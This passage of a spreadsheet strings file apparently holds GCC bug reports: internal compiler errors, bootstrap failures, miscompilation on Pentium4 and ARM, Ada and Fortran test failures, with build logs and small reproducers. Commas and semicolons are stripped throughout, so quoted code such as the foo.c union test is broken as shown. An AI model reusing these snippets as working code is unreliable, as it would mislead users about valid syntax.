  </si>
  <si>
    <t>In doing the power7 work I inadvertently disabled sqrtdf2 for power7 because I didn't notice it was a define_insn instead of the define_expand and separate define_insn as used by the other DF operations.</t>
  </si>
  <si>
    <t>GCC-61265</t>
  </si>
  <si>
    <t>gccgo: ICE in verify_gimple_in_seq [GoSmith]</t>
  </si>
  <si>
    <t>Created attachment 32840
reproducer
gcc version 4.10.0 20140516 (experimental) (GCC)
The reproducer is attached (you need to set GOPATH to the root dir).
$ go build -compiler=gccgo main
# b
src/b/0.go: In function 'b.b..import':
src/b/0.go:1:1: error: non-trivial conversion at assignment
 package b
 ^
int16 *[1][0:18446744073709551615][0:18446744073709551615]
int16 *[1][1][1]
D.1019[0] = b.Var868
src/b/0.go:1:1: internal compiler error: verify_gimple failed
0xa29b2f verify_gimple_in_seq(gimple_statement_base*)
	../../gcc/tree-cfg.c:4622
0x83aae4 gimplify_body(tree_node* bool)
	../../gcc/gimplify.c:8720
0x83aee6 gimplify_function_tree(tree_node*)
	../../gcc/gimplify.c:8805
0x5c552e Gcc_backend::write_global_definitions(std::vector &gt; const&amp; std::vector &gt; const&amp; std::vector &gt; const&amp; std::vector &gt; const&amp;)
	../../gcc/go/go-gcc.cc:2889
0x5e3592 Gogo::write_globals()
	../../gcc/go/gofrontend/gogo.cc:1292</t>
  </si>
  <si>
    <t>cmang</t>
  </si>
  <si>
    <t>dvyukov</t>
  </si>
  <si>
    <t>GCC-28090</t>
  </si>
  <si>
    <t>incorrect implementation of expand_java_arraystore</t>
  </si>
  <si>
    <t>According to the ArrayStore.java test case bounds checks should
take precedence over array store checks.  However expand_java_arraystore
clearly does it in the wrong order:
  if (TREE_CODE (rhs_type_node) == POINTER_TYPE)
    {
      tree check = build_java_arraystore_check (array rhs_node)
      java_add_stmt (check)
    }
  array = build_java_arrayaccess (array rhs_type_node index)</t>
  </si>
  <si>
    <t>GCC-55741</t>
  </si>
  <si>
    <t>[4.8 Regression] bootstrap fails in libstdc++-v3/src/c++11/thread.cc</t>
  </si>
  <si>
    <t>Bootstrap fails in libstdc++-v3/src/c++11/thread.cc: #  error No sleep function known for this target 
Making all in c++11
make[3]: Entering directory `/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/src/c++11'
/bin/sh ../../libtool --tag CXX --tag disable-shared   --mode=compile /SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/./gcc/xgcc -shared-libgcc -B/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/./gcc -nostdinc++ -L/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/src -L/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/src/.libs -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/lib -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/include -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/bin/ -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib/ -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/sys-include    -I/SCRATCH/tmp.NRXIamkeKl/src/gcc-4.8.0/libstdc++-v3/../libgcc -I/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/include/x86_64-w64-mingw32 -I/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/include -I/SCRATCH/tmp.NRXIamkeKl/src/gcc-4.8.0/libstdc++-v3/libsupc++  -std=gnu++11 -prefer-pic -D_GLIBCXX_SHARED -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Wabi  -fdiagnostics-show-location=once   -ffunction-sections -fdata-sections  -frandom-seed=thread.lo -g -O2  -c -o thread.lo ../../../../../../src/gcc-4.8.0/libstdc++-v3/src/c++11/thread.cc
libtool: compile:  /SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/./gcc/xgcc -shared-libgcc -B/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/./gcc -nostdinc++ -L/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/src -L/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/src/.libs -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib -L/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/lib -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/mingw/include -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/bin/ -B/opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/lib/ -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/include -isystem /opt/devel/gnu/gcc/MINGW_NT/x86_64-w64-mingw32/mingw-w64-runtime-trunk-svn/gcc-4.8.0/x86_64-w64-mingw32/sys-include -I/SCRATCH/tmp.NRXIamkeKl/src/gcc-4.8.0/libstdc++-v3/../libgcc -I/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/include/x86_64-w64-mingw32 -I/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/include -I/SCRATCH/tmp.NRXIamkeKl/src/gcc-4.8.0/libstdc++-v3/libsupc++ -std=gnu++11 -D_GLIBCXX_SHARED -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -Wabi -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -frandom-seed=thread.lo -g -O2 -c ../../../../../../src/gcc-4.8.0/libstdc++-v3/src/c++11/thread.cc -o thread.o
../../../../../../src/gcc-4.8.0/libstdc++-v3/src/c++11/thread.cc:65:4: error: #error No sleep function known for this target
 #  error No sleep function known for this target
    ^
../../../../../../src/gcc-4.8.0/libstdc++-v3/src/c++11/thread.cc:164:3: warning: unused parameter '__s' [-Wunused-parameter]
   __sleep_for(chrono::seconds __s chrono::nanoseconds __ns)
   ^
../../../../../../src/gcc-4.8.0/libstdc++-v3/src/c++11/thread.cc:164:3: warning: unused parameter '__ns' [-Wunused-parameter]
make[3]: *** [thread.lo] Error 1
make[3]: Leaving directory `/SCRATCH/tmp.NRXIamkeKl/gcc-4.8.0/gcc-4.8.0/x86_64-w64-mingw32/libstdc++-v3/src/c++11'</t>
  </si>
  <si>
    <t>GCC-47259</t>
  </si>
  <si>
    <t>lto</t>
  </si>
  <si>
    <t>[4.7 Regression] LTO and global register variable</t>
  </si>
  <si>
    <t>Created attachment 22947
Testcase
internal compiler error: in expand_expr_addr_expr_1 at expr.c:6917</t>
  </si>
  <si>
    <t>d.g.gorbachev</t>
  </si>
  <si>
    <t>GCC-67127</t>
  </si>
  <si>
    <t>[ARM] Avoiding odd-number ldrd/strd in movdi introduced a regression on armeb-linux-gnueabihf</t>
  </si>
  <si>
    <t>Hi
Commit r225461 which avoids odd-number ldrd/strd in movdi and its backport on gcc-5-branch (r225467) introduced several segfault (stack overflow) in the testsuite when the compiler is built for big-endian + vfp targets. 
The issue is that the movdi pattern calls gen_lowpart (SImode operands[0]) operands being in DImode but the mode of the register cannot be changed as it is explained in the macro CANNOT_CHANGE_MODE_CLASS definition:
In big-endian mode modes greater than word size (i.e. DFmode) are stored in
 VFP registers in little-endian order.  We can't describe that accurately to
 GCC so avoid taking subregs of such values.
Thus gen_lowpart_general makes a copy of that register and copy it which calls again emit_move_insn and gen_movdi and so on ...
I've a patch under test that prevent doing this when the mode of a register can't be changed but the regression discussed in this thread may be back then...
https://gcc.gnu.org/ml/gcc-patches/2015-07/msg00216.html</t>
  </si>
  <si>
    <t>yroux</t>
  </si>
  <si>
    <t>GCC-38098</t>
  </si>
  <si>
    <t>gcc.dg/cpp/subframework1.c -fno-show-column fails on darwin9</t>
  </si>
  <si>
    <t>The gcc.dg/cpp/subframework1.c -fno-show-column test case for excessive errors fails on i686-apple-darwin9 with the errors...
Executing on host: /sw/src/fink.build/gcc44-4.3.999-20081107/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc44-4.3.999-20081107/darwin_objdir/gcc/ /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c  -fno-show-column -F/sw/sr
c/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame -E  -o subframework1.i    (timeout = 300)
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:1: warning: #import is a deprecated GCC extension
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:1
                 from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Frameworks/OneSub.framework/Headers/A.h:1: warning: #import is a deprecated GCC extension
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:2: warning: #import is a deprecated GCC extension
output is:
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:1: warning: #import is a deprecated GCC extension
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:1
                 from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Frameworks/OneSub.framework/Headers/A.h:1: warning: #import is a deprecated GCC extension
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:2: warning: #import is a deprecated GCC extension
FAIL: gcc.dg/cpp/subframework1.c -fno-show-column (test for excess errors)
Excess errors:
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:1: warning: #import is a deprecated GCC extension
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:1
                 from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Frameworks/OneSub.framework/Headers/A.h:1: warning: #import is a deprecated GCC extension
In file included from /sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/subframework1.c:12:
/sw/src/fink.build/gcc44-4.3.999-20081107/gcc-4.4-20081107/gcc/testsuite/gcc.dg/cpp/frame/one.framework/Headers/one-includeSubs.h:2: warning: #import is a deprecated GCC extension</t>
  </si>
  <si>
    <t>GCC-12334</t>
  </si>
  <si>
    <t>[3.4 Regression] internal compiler error: tree check: expected decl_stmt have goto_stmt in walk_tree at tree-inline.c:1781</t>
  </si>
  <si>
    <t>Got an internal compiler error:
12:32:26{{ttyp4}pherman@mammoth}~//&gt; /usr/tmp/gcct/bin/g++34 -O -c -o
serializerimpl.o serializerimpl.i 
In file included from
/usr/tmp/gcct/lib/gcc/i386-unknown-freebsd4.9/3.4/../../../../include/c++/3.4/bits/stl_function.h:197
                 from serializerimpl.cpp:883:
/usr/tmp/gcct/lib/gcc/i386-unknown-freebsd4.9/3.4/../../../../include/c++/3.4/bits/stl_tree.h:
In instantiation of `static const _Key&amp; std::_Rb_tree&lt;_Key _Val _KeyOfValue
_Compare _Alloc&gt;::_S_key(const std::_Rb_tree_node_base*) [with _Key = uint32
_Val = std::pair _KeyOfValue =
std::_Select1st &gt; _Compare =
std::less _Alloc = std::allocator&lt;std::pair&lt;const uint32
iTypedSerializable*(*)()&gt; &gt;]':
/usr/tmp/gcct/lib/gcc/i386-unknown-freebsd4.9/3.4/../../../../include/c++/3.4/bits/stl_function.h:197:
  instantiated from `bool std::less::operator()(const _Tp&amp; const _Tp&amp;)
const [with _Tp = uint32]'
serializerimpl.cpp:883:   instantiated from here
/usr/tmp/gcct/lib/gcc/i386-unknown-freebsd4.9/3.4/../../../../include/c++/3.4/bits/stl_tree.h:449:
internal compiler error: tree check: expected decl_stmt have goto_stmt in
walk_tree at tree-inline.c:1781
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is what I'm running:
12:32:34{{ttyp4}pherman@mammoth}~//&gt; /usr/tmp/gcct/bin/g++34 -v
Reading specs from /usr/tmp/gcct/lib/gcc/i386-unknown-freebsd4.9/3.4/specs
Configured with: '../configure' '--prefix=/usr/tmp/gcct '--with-gnu-as
'--with-gnu-ld '--program-suffix=34 '--disable-nls '--enable-languages=c++
Thread model: posix
gcc version 3.4 20030917 (experimental)
12:39:54{{ttyp4}pherman@mammoth}~//&gt; uname -a
FreeBSD mammoth.eat.frenchfries.net 4.9-PRERELEASE FreeBSD 4.9-PRERELEASE #0:
Fri Sep  5 21:51:15 PDT 2003    
pherman@mammoth.eat.frenchfries.net:/u02/obj/u01/src/sys/mammoth  i386
This is my first bug report and I don't know how to attach the
(lengthy 800K) preprocessed source using bugzilla so I can mail
it to someone or here's a URL:
  http://www.frenchfries.net/paul/tripwire/serializerimpl.i.gz
Aside from the URL I read the What we want and What we don't
want but if I've forgotten something let me know.  Thanks!
-Paul.</t>
  </si>
  <si>
    <t>pherman</t>
  </si>
  <si>
    <t>GCC-9174</t>
  </si>
  <si>
    <t>[3.2 only] [Pentium4] double raw through union</t>
  </si>
  <si>
    <t>Using a union to access the raw bytes of a double returns an incorrect
part of the double when compiled with -O and -march=pentium4.
Release:
3.2.1
Environment:
System: FreeBSD binxxxxx.swox.se 4.6-STABLE FreeBSD 4.6-STABLE #1: Sun Sep 15 20:28:51 CEST 2002 tege@king.swox.se:/media/u/FreeBSD/RELENG_4/src/sys/compile/CLIENT i386
host: i386-unknown-freebsd4.6
build: i386-unknown-freebsd4.6
target: i386-unknown-freebsd4.6
configured with: /u/gcc/gcc-3.2.1/configure --enable-languages=cc++
How-To-Repeat:
The file foo.c below compiled and run
	gcc -O -march=pentium4 foo.c
	./a.out
produces
	want  419D6F34
	got   54000000
Whereas I believe the want value is correct and the got ought to
be the same which it is if compiled either without -O or without
-march=pentium4.
The program attempts to do a raw read of the high 32-bits of a double
using an array of two unsigneds.  The code seems to come out as
        fstpl   -8(%ebp)
        movsd   -8(%ebp) %xmm1
        movd    %xmm1 %eax
I think movd here is incorrect.  It ignores the [1] index on the u.s
access and instead returns the low half of the double.
For what it's worth this seems to occur the same when using a
bitfield to access part of the double which is how I struck it in
some code that's part of the GMP MPFR library.
Also for what it's worth the test d != 0 seems necessary to induce
gcc to load the double onto the x87 stack then send it to an integer
register.
Incidentally movsd+movd is not efficient no doubt a plain movl could
load from memory straight to eax.  And the fstpl is unnecessary too
since the value in question is still in the parameters on the stack
and could be read direct from there into eax.  Though perhaps it's a
bit tricky to see through a union back to the original operand for a
raw access.
--=-=-=
Content-Type: text/x-csrc
Content-Disposition: attachment filename=foo.c
union dbl
{
  double    d
  unsigned  s[2]
}
unsigned
foo (double d)
{
  union dbl  u
  if (d != 0)
    {
      u.d = d
      return u.s[1]
    }
  else
    return 0
}
int
main (void)
{
  double  d = 123456789.0
  union dbl  u
  u.d = d
  printf (want  %X\n u.s[1])
  printf (got   %X\n foo (d))
  return 0
}
--=-=-=--
Unformatted:
 --=-=-=</t>
  </si>
  <si>
    <t>user42</t>
  </si>
  <si>
    <t>GCC-54317</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: c45532m c45532n c45532o c45532p</t>
  </si>
  <si>
    <t>All fails are similar:
BUILD c45532m.adb
gnatmake --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532m.adb -largs
 --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
/test/gnu/gcc/objdir/gcc/xgcc -c -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test
/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532m.adbgnatbind -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support -x c45532m.alignatlink c45532m.ali -O2 --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/obj
dir/gcc/RUN c45532m
.. C45532M ACATS 2.5 12-08-17 21:15:16---- C45532M FIXED POINT OPERATOR *.
   * C45532M RESULT OF * OUTSIDE RESULT MODEL INTERVAL WHEN A B AND 
                A * B ARE ALL MODEL NUMBERS.
   * C45532M RESULT OF * OUTSIDE RESULT MODEL INTERVAL WHEN A B MODEL
                NUMBERS A * B NOT.
   * C45532M RESULT OF * OUTSIDE RESULT MODEL INTERVAL WHEN USING NO
                MODEL NUMBERS.
**** C45532M FAILED ****************************.
FAIL:   c45532m
BUILD c45532n.adb
gnatmake --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532n.adb -largs --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
/test/gnu/gcc/objdir/gcc/xgcc -c -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532n.adb
gnatbind -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support -x c45532n.ali
gnatlink c45532n.ali -O2 --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
RUN c45532n
.. C45532N ACATS 2.5 12-08-17 21:15:20
---- C45532N FIXED POINT OPERATOR /.
   * C45532N RESULT OF / OUTSIDE RESULT MODEL INTERVAL WHEN A B AND 
                A / B ARE ALL MODEL NUMBERS.
   * C45532N RESULT OF / OUTSIDE RESULT MODEL INTERVAL WHEN USING NO
                MODEL NUMBERS.
**** C45532N FAILED ****************************.
FAIL:   c45532n
BUILD c45532o.adb
gnatmake --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532o.adb -largs --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
/test/gnu/gcc/objdir/gcc/xgcc -c -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532o.adb
gnatbind -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support -x c45532o.ali
gnatlink c45532o.ali -O2 --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
RUN c45532o
.. C45532O ACATS 2.5 12-08-17 21:15:24
---- C45532O FIXED POINT OPERATOR *.
   * C45532O RESULT OF * OUTSIDE RESULT MODEL INTERVAL WHEN A B AND 
                A * B ARE ALL MODEL NUMBERS.
   * C45532O RESULT OF * OUTSIDE RESULT MODEL INTERVAL WHEN A B MODEL
                NUMBERS A * B NOT.
   * C45532O RESULT OF * OUTSIDE RESULT MODEL INTERVAL WHEN USING NO
                MODEL NUMBERS.
**** C45532O FAILED ****************************.
FAIL:   c45532o
BUILD c45532p.adbgnatmake --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ -gnat
ws -O2 -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532p.adb -largs --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/
/test/gnu/gcc/objdir/gcc/xgcc -c -B/test/gnu/gcc/objdir/gcc/ -gnatws -O2 -I/test
/gnu/gcc/objdir/gcc/testsuite/ada/acats/support c45532p.adbgnatbind -I/test/gnu/gcc/objdir/gcc/testsuite/ada/acats/support -x c45532p.ali
gnatlink c45532p.ali -O2 --GCC=/test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/obj
dir/gcc/
RUN c45532p
.. C45532P ACATS 2.5 12-08-17 21:15:28
---- C45532P FIXED POINT OPERATOR /.
   * C45532P RESULT OF / OUTSIDE RESULT MODEL INTERVAL WHEN A B AND 
                A / B ARE ALL MODEL NUMBERS.
   * C45532P RESULT OF / OUTSIDE RESULT MODEL INTERVAL WHEN USING NO
                MODEL NUMBERS.
**** C45532P FAILED ****************************.FAIL:   c45532p
Introduced in revision 189861:
2012-07-25 Marc Glisse 
	PR tree-optimization/30318
	* tree-vrp.c (extract_range_from_binary_expr_1) [PLUS_EXPR]:
	Handle __int128.
	[MINUS_EXPR]: Merge with PLUS_EXPR.</t>
  </si>
  <si>
    <t>GCC-51972</t>
  </si>
  <si>
    <t>[OOP] Wrong code as _copy does not honor CLASS components</t>
  </si>
  <si>
    <t>Created attachment 26435
Test case
The test case is a reduced version of chapter07/strategy_surrogate_f2003 available from http://www.cambridge.org/rouson under Resources available.
When compiling and running the program one might get:
  Program received signal SIGABRT: Process abort signal.
Backtrace for this error:
  #6  0x400AC5 in __lorenz_module_MOD___copy_lorenz_module_Lorenz at test.F90:42
  #7  0x401392 in __runge_kutta_2nd_module_MOD_integrate at test.F90:73
  #8  0x40153F in MAIN__ at test.F90:84
And with valgrind:
  Conditional jump or move depends on uninitialised value(s)
  at 0x400AD8: __lorenz_module_MOD___copy_lorenz_module_Lorenz (test.F90:42)
  by 0x4013B2: __runge_kutta_2nd_module_MOD_integrate (test.F90:73)
The issue is that there is MEMSET or CALLOC missing in integrate. There is a call to memset in constructor and assign_lorenz.</t>
  </si>
  <si>
    <t>GCC-10049</t>
  </si>
  <si>
    <t>Make all abends part way through</t>
  </si>
  <si>
    <t xml:space="preserve">From: Daniel Jacobowitz 
To: tgosselin@international-wireless.net
Cc: gcc-gnats@gcc.gnu.org toreador@attbi.com gcc-bugs@gcc.gnu.org
Subject: Re: bootstrap/10049: Make all abends part way through
Date: Wed 12 Mar 2003 15:56:36 -0500
 On Wed Mar 12 2003 at 08:39:44PM -0000 tgosselin@international-wireless.net wrote:
 &gt; End of output at time of crash was:
 &gt; mkdir libgcc
 &gt; if [ -f stmp-dirs ] then true else touch stmp-dirs fi
 &gt; /gcc_arm/gcc/xgcc -B/gcc_arm/gcc/ -B/binutils_arm/arm-aout/bin/ -B/binutils_arm/
 &gt; arm-aout/lib/ -isystem /binutils_arm/arm-aout/include -O2  -DIN_GCC -DCROSS_COMP
 &gt; ILE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem
 &gt;  ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I. -I
 &gt; ../../gcc_src/gcc -I../../gcc_src/gcc/. -I../../gcc_src/gcc/config -I../../gcc_s
 &gt; rc/gcc/../include -DL_udivsi3 -xassembler-with-cpp -c ../../gcc_src/gcc/config/a
 &gt; rm/lib1funcs.asm -o libgcc/./_udivsi3.o
 &gt; xgcc: Internal error: Segmentation fault (program as)
 &gt; Please submit a full bug report.
 &gt; See  for instructions.
 That means that your assembler crashed this is an assembler bug not a
 GCC bug.
 -- 
 Daniel Jacobowitz
 MontaVista Software                         Debian GNU/Linux Developer
</t>
  </si>
  <si>
    <t>tgosselin</t>
  </si>
  <si>
    <t>GCC-357</t>
  </si>
  <si>
    <t>Internal error is generated compiling libglade-0.13 from GNOME on Linux</t>
  </si>
  <si>
    <t>When compiling libglade-0.13 the following error is generated:
Making all in glade
make[2]: Entering directory `/mnt/build/libglade-0.13/glade'
source='glade-gnome.c' object='glade-gnome.lo' libtool=yes \
depfile='.deps/glade-gnome.Plo' tmpdepfile='.deps/glade-gnome.TPlo' \
depmode=gcc /bin/sh ../depcomp \
/bin/sh ../libtool --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I.. -I./.. -I/usr/include/gnome-xml -I/usr/lib/glib/include -I/usr/X11R6/include -I/usr/include -DNEED_GNOMESUPPORT_H -I/usr/lib/gnome-libs/include -I/usr/lib/glib/include -I/usr/X11R6/include     -g -O2 -Wall -Wunused  -c -o glade-gnome.lo `test -f glade-gnome.c || echo './'`glade-gnome.c
rm -f .libs/glade-gnome.lo
gcc -DHAVE_CONFIG_H -I. -I. -I.. -I./.. -I/usr/include/gnome-xml -I/usr/lib/glib/include -I/usr/X11R6/include -I/usr/include -DNEED_GNOMESUPPORT_H -I/usr/lib/gnome-libs/include -I/usr/lib/glib/include -I/usr/X11R6/include -g -O2 -Wall -Wunused -c glade-gnome.c -Wp-MD.deps/glade-gnome.TPlo  -fPIC -DPIC -o .libs/glade-gnome.lo
glade-gnome.c: In function `druid_build_children':
glade-gnome.c:578: warning: implicit declaration of function `gnome_druid_append_page'
glade-gnome.c:578: warning: implicit declaration of function `GNOME_DRUID'
glade-gnome.c:579: warning: implicit declaration of function `GNOME_DRUID_PAGE'
glade-gnome.c:581: warning: implicit declaration of function `gnome_druid_set_page'
glade-gnome.c: In function `druidpage_build_children':
glade-gnome.c:591: warning: implicit declaration of function `GNOME_DRUID_PAGE_STANDARD'
glade-gnome.c:591: invalid type argument of `-&gt;'
glade-gnome.c: In function `druid_new':
glade-gnome.c:1868: warning: implicit declaration of function `gnome_druid_new'
glade-gnome.c:1868: warning: return makes pointer from integer without a cast
glade-gnome.c: In function `druidpagestart_new':
glade-gnome.c:1890: warning: implicit declaration of function `gnome_druid_page_start_new'
glade-gnome.c:1890: warning: initialization makes pointer from integer without a cast
glade-gnome.c:1891: `GnomeDruidPageStart' undeclared (first use in this function)
glade-gnome.c:1891: (Each undeclared identifier is reported only once
glade-gnome.c:1891: for each function it appears in.)
glade-gnome.c:1891: `page' undeclared (first use in this function)
glade-gnome.c:1891: warning: implicit declaration of function `GNOME_DRUID_PAGE_START'
glade-gnome.c:1891: Tree check: expected class 't' have 'x' (error_mark)
glade-gnome.c:1891: Internal compiler error in `require_complete_type' at c-typeck.c:96
Please submit a full bug report.
See  for instructions.
make[2]: *** [glade-gnome.lo] Error 1
make[2]: Leaving directory `/mnt/build/libglade-0.13/glade'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/mnt/build/libglade-0.13'
make: *** [all-recursive-am] Error 2
The .i file is attached.  It's compressed in bzip2 format.
Release:
egcs-20000626 snapshot
Environment:
